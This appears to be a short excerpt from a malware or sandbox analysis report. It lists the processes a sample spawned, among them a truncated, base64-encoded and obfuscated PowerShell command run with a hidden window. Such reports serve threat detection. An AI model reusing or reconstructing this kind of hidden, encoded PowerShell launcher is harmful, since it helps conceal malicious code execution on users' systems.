Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQB0AC0ASQBUAEUATQAgAHYAYQByAGkAQQBCAEwAZQA6AGsAegBlAFEAbABVACAAIAAoAFsAdABZAFAAZQBdACgAJwBzAFkAJwArACcAcwBUAEUAbQAnACsAJwAuAGkAJwArACcAbwAuAGQASQByAEUAQwB0AE8AUg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1572
- %TEMP%\1190755.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQB0AC0ASQBUAEUATQAgAHYAYQByAGkAQQBCAEwAZQA6AGsAegBlAFEAbABVACAAIAAoAFsAdABZAFAAZQBdACgAJwBzAFkAJwArACcAcwBUAEUAbQAnACsAJwAuAGkAJwArACcAbwAuAGQASQByAEUAQwB0AE8AUg...' (with hidden window)